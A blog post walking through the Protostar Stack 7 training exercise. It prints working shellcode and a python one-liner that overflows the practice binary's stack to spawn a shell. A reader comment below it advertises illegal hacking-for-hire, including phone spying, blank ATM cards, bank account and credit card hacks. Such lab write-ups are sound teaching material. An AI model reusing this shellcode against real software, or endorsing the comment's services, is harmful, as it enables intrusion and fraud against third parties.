Tuesday, November 22, 2016

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

1 comment:

wizardcyprus hacker said...


Are you desperately in need of a hacker in any area of your life???

then you can contact: wizardcyprushacker@gmail.com

I will help you at affordable prices, i offer services like
-hack into your cheating partner's phone(whatsapp,bbm.gmail,icloud,facebook and others)
-Sales of Blank ATM cards.

-hack into email accounts and trace email location -all social media accounts,

-school database to clear or change grades,

-Retrieval of lost file/documents

-DUIs -company records and systems,

-Bank accounts,Paypal accounts, bitcoins accounts, -Credit cards hacker

-Credit score hack -Monitor any phone and email address

-Websites hacking, pentesting.

-IP addresses and people tracking.

-Hacking courses and classes.

my services are the best on the market and 100% security and discreet work is guaranteed.....

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...